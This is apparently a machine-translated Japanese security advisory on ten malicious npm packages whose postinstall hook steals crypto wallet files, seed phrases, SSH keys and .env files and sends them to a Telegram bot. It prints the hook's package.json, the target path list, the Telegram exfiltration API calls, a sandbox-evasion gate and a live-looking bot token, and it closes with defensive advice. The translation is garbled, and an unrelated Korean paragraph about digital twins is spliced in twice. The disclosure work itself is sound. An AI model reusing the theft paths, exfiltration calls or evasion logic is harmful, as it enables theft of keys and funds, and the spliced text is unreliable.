TL; DR
2026年6月9日、単一のnpmパブリッシャーアカウント、 aicrypto-xzggg発送済み 10個のパッケージ 暗号通貨やWeb3関連の名称で — farming-tools-12, swap-sdk-87, defi-tools-39, wallet-sdk-9そしてさらに6人。
すべてのパッケージは、 postinstall フック。インストール時に、CI またはサンドボックス内で実行されているかどうかを確認します。そうでない場合は、ウォレットキーストア、シードフレーズファイル、SSH キーを読み取ります。 .env 6つのブロックチェーンエコシステムからファイルを取得し、Telegramボットに送信する。
防御側が即座に探せる唯一の指標はTelegramボットIDである。 8227918239.
重大度: 重大な — 署名キーとリカバリーフレーズの直接的な盗難 開発者用ワークステーション.
攻撃:その仕組み
これらのパッケージは、ブロックチェーン開発者向けユーティリティとして宣伝されている。 package.json これは最小限であり、インストールライフサイクルをスクリプトに指示します。
{ "name": "farming-tools-12", "main": "src/index.js", "scripts": { "postinstall": "node scripts/postinstall.js" }, "keywords": ["web3", "crypto", "blockchain", "solana", "ethereum"], "author": "Alex Smith", "license": "MIT" } scripts/postinstall.js これは、実際のペイロードをロードする1行のシムです。 require(“../src/index.js”)。 なぜなら インストール後 実行中は自動的に npmインストール開発者によるコードのインポートは不要です。パッケージを依存関係ツリーに配置するだけで実行できます。
内部のキルチェーン src / index.js 手順は4つです。
- 環境チェック。 ガード関数は、ホストがビルドエージェントのように見えるか、分析サンドボックスのように見えるかを決定します。
- 遅れ。 実行は延期され、 setTimeout およそ7.4秒。
- コレクション。 ウォレット、キー、シークレットファイルのパスの固定リストが順に処理され、既存のファイルはキューに追加されます。
- 漏出。 キューに登録されたファイルは、要約メッセージが先行してTelegramボットに送信されます。
収集対象リストは6つのチェーンと一般的な開発者シークレットにまたがっています。トリミング済み:
~/.config/solana/id.json ~/.ethereum/keystore ~/.solana/keypair.json ~/.bitcoin/wallet.dat ~/.tron_wallet/keystore ~/.sui/sui_config/sui.keystore ~/.aptos/key.txt ~/.ssh/id_rsa , ~/.ssh/id_ed25519 ./wallet.json ./keystore.json ./mnemonic.txt ./seed.txt ./seedphrase.txt ./recovery.txt ./private.key ./.env ./.env.local 合計21のパス。ディレクトリエントリ例: ~/.ethereum/keystore 展開され、内部のすべてのファイルがキューに入れられます。流出はTelegram Bot APIを直接使用します。 メッセージを送る ホストとファイルの概要を指定して呼び出し、次に 送信文書 ファイルごとにマルチパートアップロードを行う:
클라우드 기반 AI/ML및 고성능 컴퓨팅을 통한 디지털 트윈의 기초 – Edward Hsu, Rescale CPO 많은 엔지니어링 중심 기업에게 클라우드는 R&D디지털 전환의 첫 단계일 뿐입니다. 클라우드 자원을 활용해 엔지니어링 팀의 제약을 해결하는 단계를 넘어, 시뮬레이션 운영을 통합하고 최적화하며, 궁극적으로는 모델 기반의 협업과 의사 결정을 지원하여 신제품을 결정할 때 데이터 기반 엔지니어링을 적용하고자 합니다. Rescale은 이러한 혁신을 돕기 위해 컴퓨팅 추천 엔진, 통합 데이터 패브릭, 메타데이터 관리 등을 개발하고 있습니다. 이번 자리를 빌려 비즈니스 경쟁력 제고를 위한 디지털 트윈 및 디지털 스레드 전략 개발 방법에 대한 인사이트를 나누고자 합니다.
POST https://api.telegram.org/bot<token>/sendMessage POST https://api.telegram.org/bot<token>/sendDocument (one per file) コードが組み立てる要約メッセージは、リテラル文字列で始まります。 暗号通貨泥棒続いて、ホスト名、ユーザー名、元のパッケージ名、ファイル数、タイムスタンプが表示されます。
ここに何か新しいことはありますか?
差別化要因は窃盗メカニズムではなく、npmからのTelegramベースのデータ流出である。 インストール後 hooks よく踏み固められている。それは 実行ゲート。 ペイロードは、何らかの処理を実行する前に、ホストがCIランナーまたはサンドボックスに似ている場合にtrueを返す関数を呼び出し、その場合は早期に処理を終了します。
클라우드 기반 AI/ML및 고성능 컴퓨팅을 통한 디지털 트윈의 기초 – Edward Hsu, Rescale CPO 많은 엔지니어링 중심 기업에게 클라우드는 R&D디지털 전환의 첫 단계일 뿐입니다. 클라우드 자원을 활용해 엔지니어링 팀의 제약을 해결하는 단계를 넘어, 시뮬레이션 운영을 통합하고 최적화하며, 궁극적으로는 모델 기반의 협업과 의사 결정을 지원하여 신제품을 결정할 때 데이터 기반 엔지니어링을 적용하고자 합니다. Rescale은 이러한 혁신을 돕기 위해 컴퓨팅 추천 엔진, 통합 데이터 패브릭, 메타데이터 관리 등을 개발하고 있습니다. 이번 자리를 빌려 비즈니스 경쟁력 제고를 위한 디지털 트윈 및 디지털 스레드 전략 개발 방법에 대한 인사이트를 나누고자 합니다.
isTestEnvironment() is true when ANY of: - env CI == "true" OR GITHUB_ACTIONS == "true" OR JENKINS_HOME set - env NODE_ENV in {test, development} - username/USER contains: runner, sandbox, test, docker, jenkins, gitlab, travis, circleci - hostname contains: sandbox, test, ci - hostname matches /^[a-f0-9]{12}$/ (a container-id shape) コンテナ ID の正規表現は注目すべき句です。12 文字の 16 進数のホスト名は、Docker がコンテナに割り当てるデフォルトの形式です。 コンテナそのため、ペイロードは「ホスト名がDockerコンテナのように見える」ことを休止状態を維持する理由として扱います。7秒の遅延と相まって、この設計は開発者の実際のワークステーションで実行し、自動分析のように見える場所ではどこでも静かに動作することを優先します。このゲートによって動的分析シグナルが抑制され、静的なデータ流出フローが主要な有罪証拠として維持されました。
タイムライン
| 日付(UTC) | イベント |
|---|---|
| 2026-06-09 ~02:48 | クラスター内の最初のパッケージは公開時にフラグが立てられました(crypto-utils-7, ethereum-kit-1, web3-tools-9, solana-core-4, blockchain-helper-0) |
| 2026-06-09 ~03:21–03:25 | 上位バージョンのメンバーにフラグが立てられました(ethereum-kit-9 1.25.36で、 wallet-sdk-9 3.7.73時点 |
| 2026-06-09 ~03:58–03:59 | 最終メンバーがフラグ付けされました(defi-tools-39 4.26.29で、 swap-sdk-87 4.63.78で、 farming-tools-12 4.68.54時点 |
| 2026-06-09 | 10件すべてが悪意のあるものとして分類され、レジストリ削除のために報告されました。 |
10件すべてが約70分以内に公開され、これは1つのアカウントからの1回のスクリプト化された投稿と一致している。
侵害の兆候
ネットワークおよび行動指標(ホストの牙を抜いた状態):
| インジケータ | 値 |
|---|---|
| 流出終点 | api[.]telegram[.]org (TelegramボットAPI) |
| TelegramボットID | 8227918239 |
| ボットトークン | 8227918239:AAGEMDrBZluDsBBYPxfSyMuv2l3FY8cZCcs |
| TelegramチャットID | 6433587894 |
| フックを取り付ける | postinstall → scripts/postinstall.js → src/index.js |
| マーカーストリング | CRYPTO STEALER まとめられた要約メッセージ |
| Publisher | aicrypto-xzggg (記載されたメール) vipsyria88@gmail[.]com(未確認) |
パッケージとバージョン、それぞれにSHA-256ハッシュ値が含まれています src / index.js ペイロード(ペイロードは機能的に同一であり、埋め込まれたパッケージ名ラベルのみが異なるため、各ハッシュは一意です):
| パッケージ | src/index.js の SHA-256 ハッシュ値 | |
|---|---|---|
farming-tools-12 | 4.68.54 | b50403be9dd9f94f7af4795c1e346c9d27d5a18041a3044773238c4cdc1f4de4 |
swap-sdk-87 | 4.63.78 | 9d96f8759e8d593b6dd2338aceb08cdb12e9a5613700953e04e66cc8c2e3087c |
defi-tools-39 | 4.26.29 | ddc5011b6173a57bc7f29b010ed6b71551dee253b5d05d3efc78d076f5351fee |
wallet-sdk-9 | 3.7.73 | ef4459281c64f1fe8923d703d416f04080ff1a2b7b385366f46d7cdb25731502 |
ethereum-kit-9 | 1.25.36 | c43afad949027040c6414d26fa4eea6e2671d2572f9df7fd595e12baf204854f |
ethereum-kit-1 | 1.0.0 | 1147f5227f3b13f65a438b31d87766c33affc65b7734a8658c95e0a4be1d2381 |
solana-core-4 | 1.0.0 | 93c65f971137d2753b5c57b685471bf5319bdc357fa863de56cbed8447cf576d |
web3-tools-9 | 1.0.0 | db97070bd349503f5703404493fc925448c2308c86708b33786309ebe6446a3d |
crypto-utils-7 | 1.0.0 | 59f2fb112d6f17102fb4a70c8d12bfcbc93e9f0d170fe4451bad1aa4d5d74c92 |
blockchain-helper-0 | 1.0.0 | 053eb318980439d76eecac9847ae31ecf59654cf75ddcfebbdd9ce64bb98a0db |
簡単な検索クエリは次のとおりです。インストールログとロックファイルから、上記10個のいずれかの名前を検索し、通常はTelegram Bot APIを使用していないビルドホストまたは開発者ホストから、Telegram Bot APIへの接続がある送信トラフィックを検索します。
帰属と観察された行動
10個のパッケージすべてが1つのアカウントによって公開されました。 aicrypto-xzgggメールアドレスは vipsyria88@gmail[.]comレジストリのメタデータには、メールアドレスとソースコード管理リンクの両方が未検証であり、アカウントの評判スコアは非常に低い。アカウントの運営者は確認できていない。
2つの詳細は、いかなる身元主張からも切り離して考える価値がある。まず、 package.json 著者 フィールドの読み取り アレックス·スミス 各パッケージには実際のパブリッシングアカウントが表示されます aicrypto-xzggg;著者フィールドは自己申告メタデータであり、著者を確立するものではありません。第二に、バージョン番号は大きく異なります。一部のメンバーは 1.0.0、その他 4.68.54 これは、実際のリリース履歴を維持するのではなく、新しく作成されたパッケージ名全体で単一のペイロードを再利用することと一致しています。
クラスター全体で動作は均一です。同じターゲット パス リスト、同じ Telegram ボット ID とチャット ID、同じ環境ゲート、同じ 暗号通貨泥棒 マーカー。その均一性こそが、パッケージ間の最も強い結びつきである。それは同一事業者を示す信号であって、同一性を示すものではない。
影響、動向、および防衛担当者向けのガイダンス
脆弱性は明白です。ソフトウェアウォレット、シードフレーズファイル、またはSSHキーを保持するワークステーションにこれらのパッケージをインストールする開発者は、数秒以内にそれらのファイルが読み取られ、ホストから送信されます。リカバリフレーズと署名キーはセッショントークンのように期限切れになりません。 mnemonic.txt またはソラナ id.json マシンから離れると、マシンが管理する資金は移動されるまで危険にさらされます。同じ実行でキャプチャされます .env これらのファイルには、通常、APIキーとデータベース認証情報が含まれています。
このクラスターの背景には、2つのトレンドがある。1つ目は、特定のユーザー層(依存関係をインストールするマシンと同じマシンにウォレットと秘密鍵を保管する開発者)を取り込むために、暗号化やWeb3をテーマにした名前が引き続き使用されていることだ。2つ目は、インストール時のペイロードにおけるサンドボックス回避技術の成熟である。CI環境変数、ランナーのユーザー名、DockerコンテナIDホスト名の形式をチェックするゲートは、分析時と実際のワークステーションでの動作を意図的に異なるものにするためのものであり、純粋な動的検出のハードルを引き上げている。
防御側にとって:
デフォルトではスクリプトが無効になっている状態でインストールします。 npm install –ignore-scripts、またはセット ignore-scripts=true in .npmrc、防ぐ インストール後 実行時。本当に必要な特定の依存関係に対してのみスクリプトを有効にする。
ウォレットと署名キーは、ビルドマシンや開発マシンとは別の場所に保存してください。ハードウェアウォレット、または専用の依存関係のない署名ホストを使用してください。
扱う .envキーストアやシードフレーズファイルは、最重要ファイルとして扱われます。それらは、他のファイルと同じディレクトリに置かれるべきではありません。 npmインストール ワーキングツリー。
CI環境や開発者ホストからTelegram Bot APIへのアウトバウンド接続を探してください。ほとんどのビルド環境ではTelegram Bot APIは呼び出されませんが、インストール直後に突然呼び出される場合は調査する価値があります。
依存関係をピン留めして確認します。汎用的な暗号化名を持つ真新しいパッケージ、 インストール後 フックであり、ロックファイルに入る前に確認する必要のあるリポジトリリンクはありません。
コンテナID回避条項は、アナリストへの注意喚起でもある。サンドボックス内で休止状態にあるインストール時のペイロードは無害ではなく、選択的である。インストールパスの静的レビューは、動的実行では表示されない可能性のあるものを確認するための確実な方法である。
参考情報
npm install のドキュメント — ライフサイクル スクリプトと –無視-スクリプト— 自動インストールを無効にするための参照情報 hooks.





